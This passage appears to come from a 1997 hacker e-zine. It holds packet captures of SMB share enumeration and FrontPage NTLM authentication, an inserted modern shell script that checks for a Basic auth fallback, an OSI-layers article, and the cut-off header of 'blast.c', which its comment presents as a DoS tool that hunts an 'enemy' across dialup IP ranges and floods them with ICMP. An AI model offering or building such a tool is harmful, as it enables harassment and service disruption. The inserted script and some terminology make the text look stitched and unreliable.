SMB: C transact TransactNmPipe, FID = 0x800
    SMB: SMB Status = Error Success
        SMB: Error class = No Error
        SMB: Error code = No Error
    SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x00C0 UID = 0x0800
        SMB: Tree ID (TID) = 2048 (0x800)
        SMB: Process ID (PID) = 31936 (0x7CC0)
        SMB: User ID (UID) = 2048 (0x800)
        SMB: Multiplex ID (MID) = 192 (0xC0)
        SMB: Flags Summary = 24 (0x18)
            SMB: .......0 = Lock & Read and Write & Unlock not supported
            SMB: ......0. = Send No Ack not supported
            SMB: ....1... = Using caseless pathnames
            SMB: ...1.... = Canonicalized pathnames
            SMB: ..0..... = No Opportunistic lock
            SMB: .0...... = No Change Notify
            SMB: 0....... = Client command
        SMB: flags2 Summary = 32771 (0x8003)
            SMB: ...............1 = Understands long filenames
            SMB: ..............1. = Understands extended attributes
            SMB: ...0............ = No DFS capabilities
            SMB: ..0............. = No paging of IO
            SMB: .0.............. = Using SMB status codes
            SMB: 1............... = Using UNICODE strings
    SMB: Command = R transact
        SMB: Word count = 16
        SMB: Word parameters
        SMB: Total parm bytes = 0
        SMB: Total data bytes = 96
        SMB: Max parm bytes = 0
        SMB: Max data bytes = 1024
        SMB: Max setup words = 0 (0x0)
        SMB: Transact Flags Summary = 0 (0x0)
            SMB: ...............0 = Leave session intact
            SMB: ..............0. = Response required
        SMB: Transact timeout = 0 (0x0)
        SMB: Parameter bytes = 0 (0x0)
        SMB: Parameter offset = 84 (0x54)
        SMB: Data bytes = 96 (0x60)
        SMB: Data offset = 84 (0x54)
        SMB: Max setup words = 2
        SMB: Setup words
            SMB: Pipe function = Transact named pipe (TransactNmPipe)
            SMB: File ID (FID) = 2048 (0x800)
        SMB: Byte count = 113
        SMB: Byte parameters
            SMB: File name = \PIPE\
    SMB: Transaction data
        SMB: Data: Number of data bytes remaining = 96 (0x0060)
MSRPC: c/o RPC Request: call 0x1 opnum 0xF context 0x0 hint 0x48
    MSRPC: Version = 5 (0x5)
    MSRPC: Version (Minor) = 0 (0x0)
    MSRPC: Packet Type = Request
    MSRPC: Flags 1 = 3 (0x3)
        MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
        MSRPC: ......1. = Last fragment -or- Cancel pending
        MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
        MSRPC: ....0... = Receiver to respond with a fack PDU -or- Reserved (AES/DC)
        MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
        MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
        MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
        MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
    MSRPC: Packed Data Representation
    MSRPC: Fragment Length = 96 (0x60)
    MSRPC: Authentication Length = 0 (0x0)
    MSRPC: Call Identifier = 1 (0x1)
    MSRPC: Bind Frame Number = 17 (0x11)
    MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188
    MSRPC: Allocation Hint = 72 (0x48)
    MSRPC: Presentation Context Identifier = 0 (0x0)
    MSRPC: Operation Number (c/o Request prop. dg header prop) = 15 (0xF)
    MSRPC: Stub Data
R_SRVSVC: RPC Client call srvsvc:NetrShareEnum(..)
    R_SRVSVC: SRVSVC_HANDLE ServerName = 204.73.131.11
    R_SRVSVC: LPSHARE_ENUM_STRUCT InfoStruct {..}
        R_SRVSVC: DWORD Level = 1 (0x1)
        R_SRVSVC: _SHARE_ENUM_UNION ShareInfo {..}
            R_SRVSVC: Switch Value = 1 (0x1)
            R_SRVSVC: SHARE_INFO_1_CONTAINER *Level1 {..}
                R_SRVSVC: DWORD EntriesRead = 0 (0x0)
                R_SRVSVC: LPSHARE_INFO_1 Buffer = 0 (0x0)
    R_SRVSVC: DWORD PreferedMaximumLength = 4294967295 (0xFFFFFFFF)

00000: 00 C0 4F C4 8C 9D 00 C0 4F C4 8C 93 08 00 45 00  ..O.....O.....E.
00010: 00 E0 1A 08 40 00 80 06 41 5E CC 49 83 13 CC 49  ....@...A^.I...I
00020: 83 0B 07 28 00 8B 04 60 22 E1 00 16 F7 D4 50 18  ...(...`".....P.
00030: 20 56 40 ED 00 00 00 00 00 B4 FF 53 4D 42 25 00   V@........SMB%.
00040: 00 00 00 18 03 80 24 82 00 00 00 00 00 00 00 00  ......$.........
00050: 00 00 00 08 C0 7C 00 08 C0 00 10 00 00 60 00 00  .....|.......`..
00060: 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 54  ...............T
00070: 00 60 00 54 00 02 00 26 00 00 08 71 00 00 5C 00  .`.T...&...q..\.
00080: 50 00 49 00 50 00 45 00 5C 00 00 00 00 2D 05 00  P.I.P.E.\....-..
00090: 00 03 10 00 00 00 60 00 00 00 01 00 00 00 48 00  ......`.......H.
000A0: 00 00 00 00 0F 00 36 1C 14 00 0E 00 00 00 00 00  ......6.........
000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00  ......2.0.4...7.
000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00  3...1.3.1...1.1.
000D0: 00 00 01 00 00 00 01 00 00 00 A0 FB 12 00 00 00  ................
000E0: 00 00 00 00 00 00 FF FF FF FF 00 00 00 00        ..............

This is the response to the above share request:

27  31.376  *SMBSERVER  STUDENT7  R_SRVSVC  RPC Server response srvsvc:NetrServerGetInfo(..)  *SMBSERVER  STUDENT7  IP

FRAME: Base frame properties
    FRAME: Time of capture = Dec 3, 1997 9:12:54.46
    FRAME: Time delta from previous physical frame: 7 milliseconds
    FRAME: Frame number: 27
    FRAME: Total frame length: 230 bytes
    FRAME: Capture frame length: 230 bytes
    FRAME: Frame data: Number of data bytes remaining = 230 (0x00E6)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
    ETHERNET: Destination address : 00C04FC48C93
        ETHERNET: .......0 = Individual address
        ETHERNET: ......0. = Universally administered address
    ETHERNET: Source address : 00C04FC48C9D
        ETHERNET: .......0 = No routing information present
        ETHERNET: ......0. = Universally administered address
    ETHERNET: Frame Length : 230 (0x00E6)
    ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
    ETHERNET: Ethernet Data: Number of data bytes remaining = 216 (0x00D8)
IP: ID = 0x3C0E; Proto = TCP; Len: 216
    IP: Version = 4 (0x4)
    IP: Header Length = 20 (0x14)
    IP: Service Type = 0 (0x0)
        IP: Precedence = Routine
        IP: ...0.... = Normal Delay
        IP: ....0... = Normal Throughput
        IP: .....0.. = Normal Reliability
    IP: Total Length = 216 (0xD8)
    IP: Identification = 15374 (0x3C0E)
    IP: Flags Summary = 2 (0x2)
        IP: .......0 = Last fragment in datagram
        IP: ......1. = Cannot fragment datagram
    IP: Fragment Offset = 0 (0x0) bytes
    IP: Time to Live = 128 (0x80)
    IP: Protocol = TCP - Transmission Control
    IP: Checksum = 0x1F60
    IP: Source Address = 204.73.131.11
    IP: Destination Address = 204.73.131.19
    IP: Data: Number of data bytes remaining = 196 (0x00C4)
TCP: .AP..., len: 176, seq: 1506074-1506249, ack: 73409903, win: 7314, src: 139 (NBT Session) dst: 1832
    TCP: Source Port = NETBIOS Session Service
    TCP: Destination Port = 0x0728
    TCP: Sequence Number = 1506074 (0x16FB1A)
    TCP: Acknowledgement Number = 73409903 (0x460256F)
    TCP: Data Offset = 20 (0x14)
    TCP: Reserved = 0 (0x0000)
    TCP: Flags = 0x18 : .AP...
        TCP: ..0..... = No urgent data
        TCP: ...1.... = Acknowledgement field significant
        TCP: ....1... = Push function
        TCP: .....0..
= No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 7314 (0x1C92) TCP: Checksum = 0x7C1E TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 176 (0x00B0) NBT: SS: Session Message, Len: 172 NBT: Packet Type = Session Message NBT: Packet Flags = 0 (0x0) NBT: .......0 = Add 0 to Length NBT: Packet Length = 172 (0xAC) NBT: SS Data: Number of data bytes remaining = 172 (0x00AC) SMB: R transact TransactNmPipe (response to frame 26) SMB: SMB Status = Error Success SMB: Error class = No Error SMB: Error code = No Error SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x01C0 UID = 0x0800 SMB: Tree ID (TID) = 2048 (0x800) SMB: Process ID (PID) = 31936 (0x7CC0) SMB: User ID (UID) = 2048 (0x800) SMB: Multiplex ID (MID) = 448 (0x1C0) SMB: Flags Summary = 152 (0x98) SMB: .......0 = Lock & Read and Write & Unlock not supported SMB: ......0. = Send No Ack not supported SMB: ....1... = Using caseless pathnames SMB: ...1.... = Canonicalized pathnames SMB: ..0..... = No Opportunistic lock SMB: .0...... = No Change Notify SMB: 1....... = Server response SMB: flags2 Summary = 32771 (0x8003) SMB: ...............1 = Understands long filenames SMB: ..............1. = Understands extended attributes SMB: ...0............ = No DFS capabilities SMB: ..0............. = No paging of IO SMB: .0.............. = Using SMB status codes SMB: 1............... 
= Using UNICODE strings SMB: Command = R transact SMB: Word count = 10 SMB: Word parameters SMB: Total parm bytes = 0 SMB: Total data bytes = 116 SMB: Parameter bytes = 0 (0x0) SMB: Parameter offset = 56 (0x38) SMB: Parameter Displacement = 0 (0x0) SMB: Data bytes = 116 (0x74) SMB: Data offset = 56 (0x38) SMB: Data Displacement = 0 (0x0) SMB: Max setup words = 0 SMB: Byte count = 117 SMB: Byte parameters SMB: Pipe function = Transact named pipe (TransactNmPipe) SMB: Data: Number of data bytes remaining = 116 (0x0074) MSRPC: c/o RPC Response: call 0x1 context 0x0 hint 0x5C cancels 0x0 MSRPC: Version = 5 (0x5) MSRPC: Version (Minor) = 0 (0x0) MSRPC: Packet Type = Response MSRPC: Flags 1 = 3 (0x3) MSRPC: .......1 = Reserved -or- First fragment (AES/DC) MSRPC: ......1. = Last fragment -or- Cancel pending MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC) MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC) MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC) MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC) MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC) MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC) MSRPC: Packed Data Representation MSRPC: Fragment Length = 116 (0x74) MSRPC: Authentication Length = 0 (0x0) MSRPC: Call Identifier = 1 (0x1) MSRPC: Bind Frame Number = 25 (0x19) MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188 MSRPC: Allocation Hint = 92 (0x5C) MSRPC: Presentation Context Identifier = 0 (0x0) MSRPC: Cancel Count = 0 (0x0) MSRPC: Reserved = 0 (0x0) MSRPC: Stub Data R_SRVSVC: RPC Server response srvsvc:NetrServerGetInfo(..) 
R_SRVSVC: LPSERVER_INFO InfoStruct {..} R_SRVSVC: Switch Value = 101 (0x65) R_SRVSVC: LPSERVER_INFO_101 ServerInfo101 {..} R_SRVSVC: DWORD sv101_platform_id = 500 (0x1F4) R_SRVSVC: LPTSTR sv101_name = 1363784 (0x14CF48) R_SRVSVC: DWORD sv101_version_major = 4 (0x4) R_SRVSVC: DWORD sv101_version_minor = 0 (0x0) R_SRVSVC: DWORD sv101_type = 266251 (0x4100B) R_SRVSVC: LPTSTR sv101_comment = 1363812 (0x14CF64) R_SRVSVC: LPTSTR sv101_name = 204.73.131.11 R_SRVSVC: LPTSTR sv101_comment = R_SRVSVC: Return Value = 0 (0x0) 00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 9D 08 00 45 00 ..O.....O.....E. 00010: 00 D8 3C 0E 40 00 80 06 1F 60 CC 49 83 0B CC 49 ..<.@....`.I...I 00020: 83 13 00 8B 07 28 00 16 FB 1A 04 60 25 6F 50 18 .....(.....`%oP. 00030: 1C 92 7C 1E 00 00 00 00 00 AC FF 53 4D 42 25 00 ..|........SMB%. 00040: 00 00 00 98 03 80 24 82 00 00 00 00 00 00 00 00 ......$......... 00050: 00 00 00 08 C0 7C 00 08 C0 01 0A 00 00 74 00 00 .....|.......t.. 00060: 00 00 00 38 00 00 00 74 00 38 00 00 00 00 00 75 ...8...t.8.....u 00070: 00 48 05 00 02 03 10 00 00 00 74 00 00 00 01 00 .H........t..... 00080: 00 00 5C 00 00 00 00 00 00 00 65 00 00 00 30 CF ..\.......e...0. 00090: 14 00 F4 01 00 00 48 CF 14 00 04 00 00 00 00 00 ......H......... 000A0: 00 00 0B 10 04 00 64 CF 14 00 0E 00 00 00 00 00 ......d......... 000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00 ......2.0.4...7. 000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00 3...1.3.1...1.1. 000D0: 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 ................ 000E0: 16 00 00 00 00 00 ......

Frontpage Sniff: Below you notice the NTLM authentication process and that an application called X-vermeer-urlencoded is the utility that is encrypting our LM password. An option within IIS, "Windows NT Challenge/Response", is turned on in the following example.
21 30.856 00C04FC48C8F STUDENT7 HTTP POST Request (from client using port 1140) 204.73.131.18 STUDENT7 IP FRAME: Base frame properties FRAME: Time of capture = Dec 1, 1997 17:56:55.389 FRAME: Time delta from previous physical frame: 2 milliseconds FRAME: Frame number: 21 FRAME: Total frame length: 433 bytes FRAME: Capture frame length: 433 bytes FRAME: Frame data: Number of data bytes remaining = 433 (0x01B1) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : 00C04FC48C93 ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : 00C04FC48C8F ETHERNET: .......0 = No routing information present ETHERNET: ......0. = Universally administered address ETHERNET: Frame Length : 433 (0x01B1) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 419 (0x01A3) IP: ID = 0xB805; Proto = TCP; Len: 419 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0) IP: Precedence = Routine IP: ...0.... = Normal Delay IP: ....0... = Normal Throughput IP: .....0.. = Normal Reliability IP: Total Length = 419 (0x1A3) IP: Identification = 47109 (0xB805) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. = Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80) IP: Protocol = TCP - Transmission Control IP: Checksum = 0xA296 IP: Source Address = 204.73.131.18 IP: Destination Address = 204.73.131.19 IP: Data: Number of data bytes remaining = 399 (0x018F) TCP: .AP..., len: 379, seq: 705525-705903, ack: 4115388, win: 8760, src: 1140 dst: 80 TCP: Source Port = 0x0474 TCP: Destination Port = Hypertext Transfer Protocol TCP: Sequence Number = 705525 (0xAC3F5) TCP: Acknowledgement Number = 4115388 (0x3ECBBC) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data TCP: ...1.... 
= Acknowledgement field significant TCP: ....1... = Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 8760 (0x2238) TCP: Checksum = 0xA8FF TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 379 (0x017B) HTTP: POST Request (from client using port 1140) HTTP: Request Method = POST HTTP: Uniform Resource Identifier = /_vti_bin/_vti_aut/author.dll HTTP: Protocol Version = HTTP/1.0 HTTP: Date = Mon, 01 Dec 1997 23:57:10 GMT HTTP: MIME-Version = 1.0 HTTP: User-Agent = MSFrontPage/3.0 HTTP: Host = 204.73.131.19 HTTP: Accept = auth/sicily HTTP: Content-Length = 62 HTTP: Content-Encoding = x-vermeer-1 HTTP: Content-Type = application/x-vermeer-rpc HTTP: Undocumented Header = X-Vermeer-Content-Type: application/x-vermeer-rpc HTTP: Undocumented Header Fieldname = X-Vermeer-Content-Type HTTP: Undocumented Header Value = application/x-vermeer-rpc HTTP: Data: Number of data bytes remaining = 62 (0x003E) 00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 8F 08 00 45 00 ..O.....O.....E. 00010: 01 A3 B8 05 40 00 80 06 A2 96 CC 49 83 12 CC 49 ....@......I...I 00020: 83 13 04 74 00 50 00 0A C3 F5 00 3E CB BC 50 18 ...t.P.....>..P. 00030: 22 38 A8 FF 00 00 50 4F 53 54 20 2F 5F 76 74 69 "8....POST /_vti 00040: 5F 62 69 6E 2F 5F 76 74 69 5F 61 75 74 2F 61 75 _bin/_vti_aut/au 00050: 74 68 6F 72 2E 64 6C 6C 20 48 54 54 50 2F 31 2E thor.dll HTTP/1. 
00060: 30 0D 0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 30 31 0..Date: Mon, 01 00070: 20 44 65 63 20 31 39 39 37 20 32 33 3A 35 37 3A Dec 1997 23:57: 00080: 31 30 20 47 4D 54 0D 0A 4D 49 4D 45 2D 56 65 72 10 GMT..MIME-Ver 00090: 73 69 6F 6E 3A 20 31 2E 30 0D 0A 55 73 65 72 2D sion: 1.0..User- 000A0: 41 67 65 6E 74 3A 20 4D 53 46 72 6F 6E 74 50 61 Agent: MSFrontPa 000B0: 67 65 2F 33 2E 30 0D 0A 48 6F 73 74 3A 20 32 30 ge/3.0..Host: 20 000C0: 34 2E 37 33 2E 31 33 31 2E 31 39 0D 0A 41 63 63 4.73.131.19..Acc 000D0: 65 70 74 3A 20 61 75 74 68 2F 73 69 63 69 6C 79 ept: auth/sicily 000E0: 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 ..Content-Length 000F0: 3A 20 36 32 0D 0A 43 6F 6E 74 65 6E 74 2D 45 6E : 62..Content-En 00100: 63 6F 64 69 6E 67 3A 20 78 2D 76 65 72 6D 65 65 coding: x-vermee 00110: 72 2D 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 r-1..Content-Typ 00120: 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 e: application/x 00130: 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D 0A 58 2D -vermeer-rpc..X- 00140: 56 65 72 6D 65 65 72 2D 43 6F 6E 74 65 6E 74 2D Vermeer-Content- 00150: 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F Type: applicatio 00160: 6E 2F 78 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D n/x-vermeer-rpc. 00170: 0A 0D 0A B0 32 7D ED 9D 1C A9 A8 B3 BB BC 12 39 ....2}.........9 00180: 84 F7 B3 9C 83 A4 CF 39 B7 B4 BC 23 05 A7 41 79 .......9...#..Ay 00190: 05 F8 45 78 01 FA 41 50 01 F8 47 D4 07 55 7D E3 ..Ex..AP..G..U}. 001A0: F8 C2 9F 0F B4 BC 23 B9 A9 F9 F7 FC A4 1B 79 28 ......#.......y( 001B0: B1 . 
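The POST above is answered by an HTTP 401 carrying two WWW-Authenticate challenges, NTLM and Basic, which is what lets a client that does not understand NTLM fall back to Basic and send the password in the clear over HTTP. Here is an added shell example (not part of the original sniff, and not code from the article) that reads a captured response header block and reports which schemes the server offers, flagging Basic. The SAMPLE_401 text is constructed to match the headers seen in the trace, and the function names auth_schemes, offers_basic, scheme_count and report are my own.

```shell
#!/bin/sh
# Added example: list the authentication schemes a server offers in the
# WWW-Authenticate headers of a captured HTTP response, and flag Basic,
# whose credentials travel base64-encoded (i.e. in the clear) over HTTP.

# Constructed sample modelled on the 401 response in the trace (not the raw capture).
SAMPLE_401='HTTP/1.0 401 Access Denied
WWW-Authenticate: NTLM
WWW-Authenticate: Basic realm="204.73.131.19"
Content-Length: 24
Content-Type: text/html
'

# Print one scheme name per line (e.g. "NTLM", "Basic").
# CR characters are stripped so CRLF-terminated captures parse cleanly.
auth_schemes() {
    printf '%s' "$1" | tr -d '\r' |
        awk -F': ' 'tolower($1) == "www-authenticate" { split($2, a, " "); print a[1] }'
}

# Exit status 0 if Basic is among the offered schemes, 1 otherwise.
offers_basic() {
    auth_schemes "$1" | grep -qi '^basic$'
}

# Number of schemes offered.
scheme_count() {
    auth_schemes "$1" | wc -l | tr -d ' '
}

# Human-readable summary of one response header block.
report() {
    status=$(printf '%s' "$1" | head -n 1 | tr -d '\r')
    echo "Status line: $status"
    auth_schemes "$1" | while read -r s; do
        echo "offers: $s"
    done
    if offers_basic "$1"; then
        echo "WARNING: Basic is offered alongside NTLM; a client that picks Basic sends the password in the clear"
    fi
}

report "$SAMPLE_401"
```

Run against a real capture, feed the function the header block of the 401 (everything up to the blank line); a server that answers with only NTLM never exposes the cleartext fallback.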
If Windows NT Challenge/Response Security is enabled on the Web Server, each initial request to download a file, after establishing a TCP session, is responded to with an access denied HTTP frame:

23 30.859 STUDENT7 00C04FC48C8F HTTP Response (to client using port 1140) STUDENT7 204.73.131.18 IP FRAME: Base frame properties FRAME: Time of capture = Dec 1, 1997 17:56:55.392 FRAME: Time delta from previous physical frame: 0 milliseconds FRAME: Frame number: 23 FRAME: Total frame length: 224 bytes FRAME: Capture frame length: 224 bytes FRAME: Frame data: Number of data bytes remaining = 224 (0x00E0) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : 00C04FC48C8F ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : 00C04FC48C93 ETHERNET: .......0 = No routing information present ETHERNET: ......0. = Universally administered address ETHERNET: Frame Length : 224 (0x00E0) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 210 (0x00D2) IP: ID = 0xC126; Proto = TCP; Len: 210 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0) IP: Precedence = Routine IP: ...0.... = Normal Delay IP: ....0... = Normal Throughput IP: .....0.. = Normal Reliability IP: Total Length = 210 (0xD2) IP: Identification = 49446 (0xC126) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1.
= Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80) IP: Protocol = TCP - Transmission Control IP: Checksum = 0x9A46 IP: Source Address = 204.73.131.19 IP: Destination Address = 204.73.131.18 IP: Data: Number of data bytes remaining = 190 (0x00BE) TCP: .AP..., len: 170, seq: 4115388-4115557, ack: 705904, win: 8381, src: 80 dst: 1140 TCP: Source Port = Hypertext Transfer Protocol TCP: Destination Port = 0x0474 TCP: Sequence Number = 4115388 (0x3ECBBC) TCP: Acknowledgement Number = 705904 (0xAC570) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....1... = Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 8381 (0x20BD) TCP: Checksum = 0xD958 TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 170 (0x00AA) HTTP: Response (to client using port 1140) HTTP: Protocol Version = HTTP/1.0 HTTP: Status Code = Unauthorized HTTP: Reason = Access Denied HTTP: WWW-Authenticate = NTLM HTTP: WWW-Authenticate = Basic realm="204.73.131.19" HTTP: Content-Length = 24 HTTP: Content-Type = text/html HTTP: Data: Number of data bytes remaining = 24 (0x0018) 00000: 00 C0 4F C4 8C 8F 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E. 00010: 00 D2 C1 26 40 00 80 06 9A 46 CC 49 83 13 CC 49 ...&@....F.I...I 00020: 83 12 00 50 04 74 00 3E CB BC 00 0A C5 70 50 18 ...P.t.>.....pP. 00030: 20 BD D9 58 00 00 48 54 54 50 2F 31 2E 30 20 34 ..X..HTTP/1.0 4 00040: 30 31 20 41 63 63 65 73 73 20 44 65 6E 69 65 64 01 Access Denied 00050: 0D 0A 57 57 57 2D 41 75 74 68 65 6E 74 69 63 61 ..WWW-Authentica 00060: 74 65 3A 20 4E 54 4C 4D 0D 0A 57 57 57 2D 41 75 te: NTLM..WWW-Au 00070: 74 68 65 6E 74 69 63 61 74 65 3A 20 42 61 73 69 thenticate: Basi 00080: 63 20 72 65 61 6C 6D 3D 22 32 30 34 2E 37 33 2E c realm="204.73. 
00090: 31 33 31 2E 31 39 22 0D 0A 43 6F 6E 74 65 6E 74 131.19"..Content 000A0: 2D 4C 65 6E 67 74 68 3A 20 32 34 0D 0A 43 6F 6E -Length: 24..Con 000B0: 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F tent-Type: text/ 000C0: 68 74 6D 6C 0D 0A 0D 0A 45 72 72 6F 72 3A 20 41 html....Error: A 000D0: 63 63 65 73 73 20 69 73 20 44 65 6E 69 65 64 2E ccess is Denied.

[Basic Network Architecture, Part II...................................lurk3r]

In the last issue I covered the basics of layers and the way they communicate with each other. In this article I will get more into each specific layer. This is not going to be a huge article. I had previously thought of doing a long series on network architecture, but decided against it and to head more in the direction of H/P, although I did want to at least cover this last topic for the sake of completeness.

The Physical Layer:

The physical layer is mostly concerned with transmitting raw bits over a communication channel. The design issues at this layer mostly have to do with making sure that when one side sends a bit, such as a 0, the other side also receives it as a 0 and not a 1. The questions here are how many volts should be used to represent a 0 and how many for a 1, how many microseconds a bit occupies, whether transmission may proceed simultaneously in both directions, how the initial connection is established, and how it is torn down when both sides are finished. In some cases a transmission facility consists of multiple physical channels, in which case the physical layer can make them look like a single channel, although higher layers can also perform this function.

The Data Link Layer:

The task of the data link layer is to take a raw transmission facility and transform it into a line that appears free of transmission errors to the network layer. It does this by breaking the input up into data frames, transmitting the frames sequentially, and processing the acknowledgement frames sent back by the receiver.
Since layer 1 accepts and transmits a stream of bits without any regard to meaning or structure, it is up to the data link layer to create and recognize frame boundaries. This can be done by attaching special bit patterns to the beginning and the end of the frame. The term "frame" is not the official term for the unit exchanged by layer 2 peer processes. The correct term is "physical-layer-service-data-unit".

An issue that arises at layer 2 (and at higher layers as well) is how to keep a fast transmitter from drowning a slower receiver in data. Some mechanism must be employed to let the transmitter know how much buffer space the receiver has at the moment. Typically this flow control mechanism and the error handling are integrated together. If the line can be used to transmit data in both directions, this introduces a new complication that the data link layer software must deal with.

The Network Layer:

The network layer, sometimes called the communication subnet layer, controls the operation of the subnet. Among other things it determines the characteristics of the IMP-host interface, and how packets, the units of information exchanged in layer 3, are routed within the subnet. A major design issue here is the division of labor between the IMPs and the hosts, in particular who should ensure that all packets are correctly received at their destinations and in the proper order. What this layer of software does is accept messages from the source host, convert them to packets, and see to it that the packets get directed toward the destination. A key design issue is how the route is determined. It could be based on static tables that are "wired into" the network and rarely changed. It could also be determined at the start of each conversation.
The Transport Layer:

The basic function of the transport layer, also known as the host-host layer, is to accept data from the session layer, split it up into smaller units if need be, pass it to the network layer, and ensure that the pieces all arrive correctly at the other end. All this must be done in the most efficient way possible, and in a way that isolates the session layer from the inevitable changes in hardware technology. Under normal conditions the transport layer creates a distinct network (layer 3) connection for each transport (layer 4) connection required by the session layer. In addition to multiplexing several message streams onto one physical channel (the host-IMP channel), the transport layer must take care of establishing and tearing down connections across the network. Although the network architecture specifies nothing about the implementation, it is good to know that the transport layer is often implemented by a part of the host operating system known as the transport station.

The Session Layer:

The session layer is the user's interface into the network. It is with this layer that the user must negotiate to establish a connection with a process on some other machine. Once the connection has been established, the session layer can manage the dialog in an orderly manner, if the user has requested that service. A connection between users is usually called a session. A session might be used to allow a user to log into a remote system or to transfer a file between the machines. Another function of the session layer is management of the session once it has been set up. In some networks the session and transport layers are merged into a single layer, or the session layer is absent altogether, if all the user wants is a raw communication service.

The Application Layer:

The content of the application layer is up to the individual user.
When two user programs on different machines communicate, they alone determine the set of allowed messages and the action taken upon receipt of each. There are still many issues that arise here, for example network transparency: hiding the physical distribution of resources from the user.

There are many other layers than the ones I have introduced here. It all depends on tailoring them to your needs on the basis of what your network will be used for (i.e. business, ISP, games net) and who it will be used by (i.e. just you, friends, or half of IRC).

As I said, this will probably be the last article on this and related areas, unless I get enough mail about it. If you wish to know more on network architecture, mail me and I'll see about possibly covering more areas. Direct all comments and corrections to lurk3r@earthlink.net

Shout outs: #Virii (the old school fellaz and some of the new), #Phreak (cause it's the only decent phreak channel I've been able to find...heh), Fa-q (be more careful next time), Iczer (where is your article?), memor (hey!), Scud (quit faking u got a life and come hang with the fellaz) and jlb (mail me some rollz).

EOF

[blast.c................................................................memor]

/***a hardcore blaster by memor/hbs-sjta 1997*** IMPORTANT NOTE: This program should only be used by AOL kiddies and lamers because personally I think that DoS attacks are lame. What does it do? The program checks a range of ip addresses and when it finds your enemy's ident, it kills him with five ICMPs of the packet size you want. After the ICMP, it checks if the person is dead. - If the person is dead, it continues scanning the dialups forever (while(1)) to see if the dude didn't switched to another one.. (stop it with ctrl-c) - If the person is not dead, it will ICMP him again and again, hopefully resulting in an eventual kill. What do you use it?
